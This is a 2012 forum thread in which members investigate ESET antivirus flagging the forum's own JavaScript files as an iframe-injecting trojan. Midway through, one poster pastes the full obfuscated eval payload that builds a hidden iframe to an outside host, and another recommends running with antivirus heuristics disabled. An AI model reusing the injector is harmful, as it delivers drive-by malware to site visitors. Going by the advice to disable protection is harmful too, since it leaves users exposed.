ESET nod32 Antivirus 5.0.95 `finds` a trojan on nsaneforum`s page

[AlienForce1]

Log files -> Detected threats :

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforums.com/public/js/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

[Freddyfre]

:dunno: nod32 only problems, boh

[AlienForce1]

We have to live with it - at least on older computers .

At home I prefer to use KIS (if the computer can handle it... :lol: )

[rTg]

jep Kaspersky 2012 did not alert...

the .js looks strange

i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c-9c78c64c59c75c63c20c-2c8c7c-2c-9c63c60c64c62c63c75c20c-2c8c7c-2c-9c74c75c80c67c60c20c-2c77c64c74c64c57c64c67c64c75c80c17c63c64c59c59c60c69c18c71c70c74c64c75c64c70c69c17c56c57c74c70c67c76c75c60c18c67c60c61c75c17c7c18c75c70c71c17c7c18c-2c21c19c6c64c61c73c56c68c60c21c-7c0c18c-28c-32c-32c84c-28c-32c-32c61c76c69c58c75c64c70c69c-9c64c61c73c56c68c60c73c-1c0c82c-28c-32c-32c-32c77c56c73c-9c61c-9c20c-9c59c70c58c76c68c60c69c75c5c58c73c60c56c75c60c28c67c60c68c60c69c75c-1c-2c64c61c73c56c68c60c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c74c73c58c-2c3c-2c63c75c75c71c17c6c6c58c57c64c62c75c73c60c60c5c64c69c61c70c-2c0c18c61c5c74c75c80c67c60c5c77c64c74c64c57c64c67c64c75c80c20c-2c63c64c59c59c60c69c-2c18c61c5c74c75c80c67c60c5c71c70c74c64c75c64c70c69c20c-2c56c57c74c70c67c76c75c60c-2c18c61c5c74c75c80c67c60c5c67c60c61c75c20c-2c7c-2c18c61c5c74c75c80c67c60c5c75c70c71c20c-2c7c-2c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c78c64c59c75c63c-2c3c-2c8c7c-2c0c18c61c5c74c60c75c24c75c75c73c64c57c76c75c60c-1c-2c63c60c64c62c63c75c-2c3c-2c8c7c-2c0c18c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c5c56c71c71c60c69c59c26c63c64c67c59c-1c61c0c18c-28c-32c-32c84'][0].split('c');v="e"+"va"+"l";}if(v)e=window[v];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];}r=String;z=((e)?h:"");for(;549!=i;i+=1){j=i;if(e)s=s+r["fromC"+z](w[j]*1+41);}if(v&&e)e(s);

looks like obfuscator. It's not normal for IPB3 or?

[digimon]

sumbit the file to https://www.virustotal.com/ also double check and make sure your running the latest defientions

[hakah]

Same to Eset Smart Security!

[rudrax]

false positive Eset :angry:

[AlienForce1]

It`s a little strange what VirusTotal finds :

2ips.status.js -> Detection ratio: 2 / 41

ips.status.js -> Detection ratio: 2 / 41

shoutbox.js -> Detection ratio: 2 / 41

Virscan.org didn`t find nothing , all are 0 / 36 : shoutbox.js , ips.status.js , 2ips.status.js

On both sites (VirusTotal and Virscan) ESET didn`t report anything ... :unsure:

[Technology]

Log files -> Detected threats :

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu.../js/shoutbox.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

5/7/2012 6:27:12 PM HTTP filter archive http://www.nsaneforu...s/ips.status.js JS/Iframe.DD trojan connection terminated - quarantined Axxx...xxx Threat was detected upon access to web by the application: E:\Program Files\Mozilla Firefox\firefox.exe.

According to VB 100, Eset doesn't find false positive. I have been using Eset for quite along time, never experience false positive especially when visiting nsane.down. It possible that the particular page you try to visit or software you try to down might be infected..It also possible that the picture on the nsane forum could be exploit... Try to report this problem to Eset team.

And if there is any problem with nsane.down, I quite sure Admin will figure out..

[AlienForce1]

Technology : According to VB 100, Eset doesn't find false positive.

Worse part I think that is coming with this :

appeared when I accesed my profile (nsane.forums → Viewing Profile: AlienForce1 )

[Iznogoud]

No problems with http://www.nsaneforums.com and Eset Smart Security v5.0.95.0 at me.

Everything works ok!

[Freddyfre]

this problem only in nsane.forums

[lyldz]

ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums.

interesting :huh:

[Guest AmikM1C]

There is problem with Shoutbox on first page of forum. Not solved in Update 7119 (20120507). It can be mistake in database by ESET because ESS firewall detected today second Comodo DNS like DNS cache poisoning.

[Lite]

We're looking into this.

[FreeRyde]

ı am using eset smart security 5.0.95 no problem with nsanedown and nsaneforums.

interesting :huh:

Same here...

'nsane' has never given me any reason for concern.

My AV is disabled more often than not anyway.

Disable heuristics (guesswork), use the definitions database only.

You'll get fewer false positives.

[Lite]

Can anyone tell me if this problem still exists?

[jofre]

Lite :

Stopped ! Gone ( 5 minutes ago ) :D... :party: ESS 5.0.95.

Thanks !

[Technology]

Can anyone tell me if this problem still exists?

Looks fine at my end, perhaps the problem could be in shout box or pictures in the forums...Other then that looks fineee.. :) :showoff: